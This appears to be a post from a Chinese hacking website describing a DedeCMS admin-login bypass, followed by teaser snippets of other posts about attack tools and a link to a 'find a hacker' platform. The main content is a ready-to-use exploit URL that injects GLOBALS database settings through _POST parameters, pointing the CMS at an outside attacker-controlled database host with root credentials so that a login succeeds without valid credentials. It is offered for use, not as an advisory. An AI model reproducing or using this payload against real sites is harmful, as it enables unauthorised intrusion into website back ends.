织梦网dedecms 0day

hacker5年前 (2020-05-31)黑客文章634

把以下代码中的：validate=dcug 改为当前的验证码，即可直接进入网站后台，此漏洞的前提是必须得到后台路径才能实现。

http://www.123.com/织梦网站后台/login.php?dopost=login

&validate=dcug&userid=admin&pwd=inimda

&_POST[GLOBALS][cfg_dbhost]=116.255.183.90

&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0

&_POST[GLOBALS][cfg_dbname]=root

标签: 黑客技术

返回列表

rar.exe是什么？它是winrar自带的命令行解压程序。用于DOS命令配合其参数代码就能灵活运用在提权中，经常用在打包下载的各种文件。用法：得到了Websh...

什么叫Scapy？ Scapy是一种十分火爆且有效的数据文件解决专用工具，能够根据实际操作数据文件来工作中。Scapy能够在普遍的协议书范畴内编解码数据文件，将其发送至网上，捕捉，关系推送恳求和...

TourEx旅游网站管理系统百度不到。模板管理-/car/booking.html 编辑 burp抓包，改为/admin/Admin_TemplateEdit.a...

什么叫Wireshark？该专用工具是一个互联网排序解析器，这类专用工具将试着捕捉用以剖析，网络问题清除，文化教育，手机软件和通讯协议开发设计的互联网数据文件，并显示信息尽量详尽的获得的数据文件数...

什么叫Kismet？ Kismet是802.11无线网络的排序嗅探器，互联网探测器和入侵防御系统系统软件。该专用工具将与适用初始监控器方式的别的无线卡一起应用，而且还能够网络嗅探802.11a，80...

什么叫w3af？ w3af是搜索和开发设计Web程序运行系统漏洞最时兴，灵便和强劲的专用工具之一。它非常容易应用，它出示了数十种开发设计和网页页面评定软件的作用。别人则将其称之为以互联网为管理中心的...

找黑客平台